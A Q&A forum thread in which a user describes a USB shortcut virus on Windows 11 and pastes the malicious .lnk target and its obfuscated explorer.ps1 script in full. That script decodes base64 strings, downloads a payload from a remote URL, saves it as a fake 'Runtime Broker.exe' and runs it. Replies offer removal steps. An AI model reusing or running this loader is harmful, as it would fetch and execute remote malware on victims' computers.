# USB has a shortcut of the usbpen itself and this affects every usb I plug into my pc

Tags: usb, powershell, shortcuts, windows-11

I'm writing hoping to solve this problem that is affecting my pc since February 2022.
Basically, when I plugged my USB pen into my pc, a .lnk file appeared, and in this file I can find my files. If I see the.lnk properties, the destination is:

`C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -nologo -NoProfile -ExecutionPolicy ByPass -File explorer.ps1`

If I plug the usb pen into my android phone or tablet, it asks me to restore the unit. Moreover, there is a file called explorer.ps1 and If I open it with notepad this is what I see:

```
$a = $(get-location).Path;$b = (${env:ProgramFiles(x86)}, ${env:ProgramFiles} -ne $null)[0];$c = $env:TEMP;$d = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("V2luU29mdCBVcGRhdGUgU2VydmljZVxweXRob253LmV4ZQ=="));$f = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("aHR0cHM6Ly9lbGRpOC5naXRodWIuaW8vc3JjLnR4dA=="));$aa = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("44Wk"));$bb = $a + "\" + $aa + "\";$h = $b + "\" + $d;$mn = $c + "\Runtime Broker.exe";if (Test-Path -Path $bb -PathType Container) {ii $bb;$q = New-Object System.Net.WebClient;while (!(Test-Path $mn)) {try {$q.DownloadFile([System.Net.HttpWebRequest]::Create( -join ( -split (((New-Object System.Net.WebClient).DownloadString($f)) -replace " ", "1" -replace "`t", "0" -replace "\n", " ") | % { [char][convert]::toint32($_, 2) })).GetResponse().ResponseUri.AbsoluteUri, $mn);}catch [System.Net.WebException] {if ($_.Exception.Response.StatusCode) {exit}}catch {}Start-Sleep -s 5;}while (!(Test-Path $h)) {Start-Process -FilePath $mn -Wait;Start-Sleep -s 1;}}*
```

I scanned with both norton premium and malwarebytes, but apparently there is no virus. I tried to uninstall and reinstall the usb driver but the problem is still here. Tried to inactivate powershell, to install the new powershell version but it's not working.

(It all happened since I plugged my usb pen into a friend's chromebook. When I went to the copy shop, his file was under the .lnk file and my files were not available. Since then, every usbpen, sd card, device I plug into my Lenovo, this .lnk file appears and can't be deleted).

Thank you

Comment: Open Settings, then type Autoplay into the search box, then deal with the Autoplay settings for the USB device. This normally works.

Answer (score 0):

I ran into the same problem.
Every time I connected the USB flash drive to the computer, the script would self-replicate.

I analyzed the code and my attention fell on **Runtime Broker.exe**.
After analyzing the processes running on the task manager, I identified a process running with the same name at the same time as the basic one: **Runtime Broker (32bit)**.

> the Runtime Broker is a small little program that is used to manage
> Apps or programs downloaded through Microsoft's Store, the program can
> be reached at the following path: **C:\Windows\System32**.

Analyzing the path to the program's namesake, I ended up inside **C:\Windows** and trying to run the program got an error followed by a missing python file, which is rather strange.

**I terminated the process and deleted the executable**.

When this procedure was finished I eliminated the problem and after recovering the data by following any guide for eliminating the virus shortcut I formatted the flash drive, re-inserted it into the pc and everything was back to normality.